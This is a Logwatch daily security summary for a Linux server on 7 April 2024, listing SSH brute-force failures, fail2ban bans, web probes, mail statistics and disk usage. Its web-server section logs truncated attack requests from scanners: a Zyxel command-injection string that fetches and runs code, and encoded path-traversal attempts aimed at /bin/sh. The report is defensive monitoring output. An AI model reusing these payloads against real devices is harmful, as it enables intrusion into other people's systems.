################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Apr 8 04:42:03 2024
Date Range Processed: yesterday
( 2024-Apr-07 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 26:26 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
148.135.35.230 -> 81.169.150.252:443: 1 Time(s)
45.125.66.34 -> google.com:443: 1 Time(s)
87.121.69.52 -> google.com:443: 4 Time(s)
A total of 6 sites probed the server
164.52.0.94
192.241.236.73
205.210.31.217
45.95.169.184
64.62.156.79
78.153.140.179
Requests with error response codes
400 Bad Request
null: 8 Time(s)
*: 5 Time(s)
google.com:443: 5 Time(s)
/: 3 Time(s)
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 2 Time(s)
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%3 ... 5%%32%65/bin/sh: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... %2e/.%2e/bin/sh: 1 Time(s)
/manager/html: 1 Time(s)
/manager/text/list: 1 Time(s)
81.169.150.252:443: 1 Time(s)
H\x1E9#Y\xEE8\xCBm\xCE\x81T\xB2L\x16\xEB\x ... C0\xAE\xC0+\xC0: 1 Time(s)
Mb\x80=|\xADXj\x8C\x9BB\xCC}\x9A\xC4MkE\xF ... C0\xAE\xC0+\xC0: 1 Time(s)
\x82\xE9\xEDg5M-\x94<y\x909\x82\x0Cve\xE1\ ... C0\xAE\xC0+\xC0: 1 Time(s)
\xAD\x00\xA6\xA6<3\xAF\xF4m\xAC\x82\x06\xF ... C\x00<\x00/\x00: 1 Time(s)
\xC1\xCB\x15\xBB\xF97\xC7\xC4\x7F?\xBA\xF2 ... C\x00<\x00/\x00: 1 Time(s)
\xC5.&D\xF8~Q\xA1Z\x11\xAA\xDD\xAD\xA9\xB8 ... xD8\xF7\x1F\xF9: 1 Time(s)
\xD1: 1 Time(s)
\xDC\x98\xC9\x95_[*\xC4\xCA\x9F\x1D\xB7iX\ ... C0$\x13\x05\xC0: 1 Time(s)
dd\x0F-\xD5.\xE0\xDB\xCD\xB72\xFD\xD7'\xB2 ... x13\xC0\x11\x00: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/: 9 Time(s)
/.git/config: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/actuator/gateway/routes: 1 Time(s)
/autodiscover/autodiscover.json?@zdi/Powershell: 1 Time(s)
/favicon.ico: 1 Time(s)
/geoserver/web/: 1 Time(s)
/version: 1 Time(s)
/vpnsvc/connect.cgi: 1 Time(s)
/webui/: 1 Time(s)
502 Bad Gateway
/register/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (170.64.230.199): 118 Time(s)
root (183.81.169.238): 34 Time(s)
root (179.43.180.106): 33 Time(s)
root (212.70.149.150): 14 Time(s)
unknown (212.70.149.150): 10 Time(s)
unknown (185.156.72.81): 9 Time(s)
unknown (170.64.200.50): 7 Time(s)
unknown (fixed-186-96-145-241.totalplay.net): 7 Time(s)
root (104-230-097-051.res.spectrum.com): 6 Time(s)
root (113.106.88.146): 6 Time(s)
root (175.206.80.31): 6 Time(s)
root (175.4.27.65): 6 Time(s)
root (185.232.136.141): 6 Time(s)
root (222.73.134.197): 6 Time(s)
unknown (210.97.49.3): 6 Time(s)
root (170.64.200.50): 5 Time(s)
root (193.222.96.178): 5 Time(s)
root (221.163.71.185): 5 Time(s)
root (59.21.213.225): 5 Time(s)
root (61.157.177.227): 5 Time(s)
unknown (170.64.230.199): 4 Time(s)
unknown (185.196.8.151): 3 Time(s)
unknown (221.149.13.65): 3 Time(s)
root (185.156.72.81): 2 Time(s)
root (198.167.192.65): 2 Time(s)
root (61.74.14.153): 2 Time(s)
unknown (198.167.192.65): 2 Time(s)
unknown (31.184.198.71): 2 Time(s)
root (1.31.87.230): 1 Time(s)
root (201.234.106.218): 1 Time(s)
root (219-89-197-82.adsl.xtra.co.nz): 1 Time(s)
root (31.184.198.71): 1 Time(s)
unknown (047-051-249-162.biz.spectrum.com): 1 Time(s)
unknown (1.235.192.131): 1 Time(s)
unknown (106.12.174.50): 1 Time(s)
unknown (111.26.196.121): 1 Time(s)
unknown (112.26.99.92): 1 Time(s)
unknown (113.140.95.250): 1 Time(s)
unknown (119.18.84.53): 1 Time(s)
unknown (122.180.244.38): 1 Time(s)
unknown (191.36.151.234): 1 Time(s)
unknown (191.36.154.175): 1 Time(s)
unknown (194.30.115.114): 1 Time(s)
unknown (200.241.185.115): 1 Time(s)
unknown (200.91.234.36): 1 Time(s)
unknown (202.70.36.122): 1 Time(s)
unknown (203.116.95.48): 1 Time(s)
unknown (220.95.14.102): 1 Time(s)
unknown (223.83.138.102): 1 Time(s)
unknown (41.193.50.163): 1 Time(s)
unknown (47.185.58.2): 1 Time(s)
unknown (47.187.182.21): 1 Time(s)
unknown (49.248.46.2): 1 Time(s)
unknown (50.223.176.171): 1 Time(s)
unknown (61-219-82-123.hinet-ip.hinet.net): 1 Time(s)
unknown (65.20.143.108): 1 Time(s)
unknown (91.218.160.238): 1 Time(s)
unknown (94.203.171.157): 1 Time(s)
unknown (c-98-244-20-77.hsd1.ca.comcast.net): 1 Time(s)
unknown (host-176-36-164-107.b024.la.net.ua): 1 Time(s)
unknown (wsip-184-185-103-69.oc.oc.cox.net): 1 Time(s)
Invalid Users:
Unknown Account: 86 Time(s)
systemd-user:
Unknown Entries:
session opened for user root by (uid=0): 1 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10 Miscellaneous warnings
1.620K Bytes accepted 1,659
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
307 Connections
36 Connections lost (inbound)
307 Disconnections
1 Removed from queue
1 Sent via SMTP
2 SMTP dialog errors
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- rsyslogd Begin ------------------------
**** Unmatched entries ****
[origin software="rsyslogd" swVersion="8.4.2" x-pid="216" x-info="http://www.rsyslog.com"] exiting on signal 15. : 1 Times
---------------------- rsyslogd End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
systemd-logind: New seat seat0.: 1 Time(s)
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
SSHD Killed: 1 Time(s)
SSHD Started: 2 Time(s)
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 5 Time(s)
Failed logins from:
1.31.87.230: 1 time
31.184.198.71: 1 time
59.21.213.225: 6 times
61.74.14.153: 2 times
61.157.177.227 (227.177.157.61.dial.dy.sc.dynamic.163data.com.cn): 5 times
104.230.97.51 (104-230-097-051.res.spectrum.com): 6 times
113.106.88.146: 6 times
170.64.200.50: 5 times
170.64.230.199: 118 times
175.4.27.65: 6 times
175.206.80.31: 6 times
179.43.180.106 (hostedby.privatelayer.com): 33 times
183.81.169.238: 34 times
185.156.72.81: 2 times
185.232.136.141: 6 times
193.222.96.178: 5 times
198.167.192.65: 2 times
201.234.106.218 (201-234-106-218.static.impsat.net.ar): 1 time
212.70.149.150: 14 times
219.89.197.82 (219-89-197-82.adsl.xtra.co.nz): 1 time
221.163.71.185: 6 times
222.73.134.197: 6 times
Illegal users from:
2001:470:1:332::7 (scan-41af.shadowserver.org): 1 time
undef: 38 times
1.235.192.131: 1 time
31.184.198.71: 3 times
41.193.50.163: 1 time
47.51.249.162 (047-051-249-162.biz.spectrum.com): 1 time
47.185.58.2: 1 time
47.187.182.21: 1 time
49.248.46.2 (static-2.46.248.49-tataidc.co.in): 1 time
50.223.176.171: 1 time
61.219.82.123 (61-219-82-123.hinet-ip.hinet.net): 1 time
64.62.156.102 (scan-66-8.shadowserver.org): 1 time
65.20.143.108: 1 time
79.136.112.163 (h-79-136-112-163.A139.corp.bahnhof.se): 1 time
91.218.160.238: 1 time
94.203.171.157: 1 time
98.244.20.77 (c-98-244-20-77.hsd1.ca.comcast.net): 1 time
106.12.174.50: 1 time
111.26.196.121: 1 time
112.26.99.92: 1 time
113.140.95.250: 1 time
119.18.84.53: 5 times
122.180.244.38 (abts-north-static-38.244.180.122.airtelbroadband.in): 1 time
170.64.200.50: 8 times
170.64.230.199: 4 times
176.36.164.107 (host-176-36-164-107.b024.la.net.ua): 1 time
184.185.103.69 (wsip-184-185-103-69.oc.oc.cox.net): 1 time
185.156.72.81: 9 times
185.196.8.151: 3 times
186.96.145.241 (fixed-186-96-145-241.totalplay.net): 7 times
191.36.151.234 (vipturbo.com.br): 1 time
191.36.154.175 (vipturbo.com.br): 1 time
194.30.115.114 (194_30_115_114_CESP0009.lpp_za_bi.ips.sarenet.es): 1 time
198.167.192.65: 2 times
200.91.234.36 (desenliste.ifxcorp.com): 1 time
200.241.185.115: 1 time
202.70.36.122: 1 time
202.175.76.242 (z76l242.static.ctm.net): 1 time
203.116.95.48: 1 time
210.97.49.3: 6 times
212.70.149.150: 11 times
220.95.14.102: 1 time
221.149.13.65: 3 times
223.83.138.102: 1 time
Users logging in through sshd:
root:
77.181.66.113 (dynamic-077-181-066-113.77.181.pool.telefonica.de): 1 time
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (0,ssh-connection) -> (root,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 2 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (ubnt,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (admin,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop19598p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################